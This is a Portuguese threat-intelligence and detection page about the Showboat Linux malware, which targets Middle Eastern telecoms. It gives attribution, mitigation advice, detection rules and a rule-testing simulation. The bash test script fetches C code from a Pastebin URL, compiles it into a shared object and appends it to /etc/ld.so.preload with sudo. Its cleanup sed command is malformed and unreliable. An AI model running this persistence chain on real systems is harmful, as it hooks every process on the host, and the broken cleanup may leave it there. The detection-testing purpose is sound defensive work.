Malware Showboat Alvo de Empresas de Telecomunicações do Oriente Médio Desde 2022
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Showboat é uma estrutura modular de pós-exploração para Linux construída para ambientes AMD x86-64. Ativo desde meados de 2022, ele é projetado para manter um acesso silencioso e de longo prazo em redes comprometidas. O malware usa métodos avançados de evasão, incluindo criptografia XOR e abuso do linker dinâmico para ocultar processos maliciosos.
Investigação
A investigação rastreou a infraestrutura de comando e controle até Chengdu, China, que, juntamente com as táticas, técnicas e procedimentos observados, sugere vínculos com agentes de ameaça alinhados à República Popular da China. A análise técnica mostrou que o malware depende de uma chave XOR hardcoded para descriptografar sua configuração e abusa ld.so.preload para alcançar furtividade em sistemas infectados.
Mitigação
Os defensores devem observar alterações não autorizadas em /etc/ld.so.preload e uso suspeito do gcc compilador em hosts Linux de produção. Também é recomendada a implantação de monitoramento de rede capaz de identificar comportamento de beaconing, mesmo quando o tempo é randomizado, e usar monitoramento de integridade para bibliotecas de sistema críticas.
Resposta
Se a atividade do Showboat for detectada, isole imediatamente os sistemas Linux afetados da rede para interromper o tráfego de comando e controle adicional. Realize forense de memória para identificar objetos compartilhados injetados e execute uma auditoria completa das configurações do sistema e tarefas agendadas para confirmar que todos os mecanismos de persistência foram removidos.
Fluxo de Ataque
Detecções
Tentativa de Comunicação de Domínio Suspeito do Pastebin (via proxy)
Visualizar
Upload/Download de Arquivo Remoto via Ferramentas Padrão (via linha de comando)
Visualizar
Detecção de Atividade de Beacon do Malware Showboat [Criação de Processo Linux]
Visualizar
Detectar Atividade do Malware Showboat – Modificação de ld.so.preload e Obtenção de Arquivo de Origem [Criação de Processo Linux]
Visualizar
Execução de Simulação
Pré-requisito: O Check de Pré-voo de Telemetria & Baseline deve ter sido aprovado.
Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa & Comandos do Ataque: O atacante visa estabelecer interceptação persistente de chamadas de sistema. Eles começam baixando um arquivo de origem C malicioso de um URL raw do Pastebin usando
curl. Uma vez baixado, eles usamgcccom as flags-sharedand-fPICpara compilar a origem em um arquivo de objeto compartilhado chamadomalicious.so. Finalmente, eles tentam alcançar persistência ao adicionar o caminho desta biblioteca/etc/ld.so.preload. Esta sequência é projetada para injetar a biblioteca maliciosa em todos os processos do sistema. -
Script de Teste de Regressão:
#!/bin/bash # Simulação de TTPs do Malware Showboat # 1. Simular obtenção de fonte C do Pastebin # Nota: Usando um link pastebin raw real (simulado para lógica) ou simulando a string echo "Criando simulação de download de pastebin simulado..." echo 'void __attribute__((constructor)) init() {}' > fake_malware.c # Este comando aciona a parte 'selection_fetch' da regra curl -s https://pastebin.com/raw/example_id -o fake_malware.c # 2. Simular compilação de um objeto compartilhado # Este comando aciona a parte 'selection_compile' da regra # (selection_fetch AND selection_compile) gcc -shared -fPIC -o /tmp/malicious.so fake_malware.c # 3. Simular modificação de ld.so.preload # Este comando aciona a parte 'selection_preload' da regra echo "/tmp/malicious.so" | sudo tee -a /etc/ld.so.preload echo "Simulação completa. Verifique o SIEM para alertas." -
Comandos de Limpeza:
#!/bin/bash # Limpeza de artefatos de simulação # Remover a biblioteca e fonte maliciosas sudo rm -f /tmp/malicious.so rm -f fake_malware.c # Remover a entrada de ld.so.preload (Requer cautela) # Este comando sed remove a linha contendo /tmp/malicious.so sudo sed -i '//tmp/malicious.so/d' /etc/ld.so.preload echo "Limpeza completa."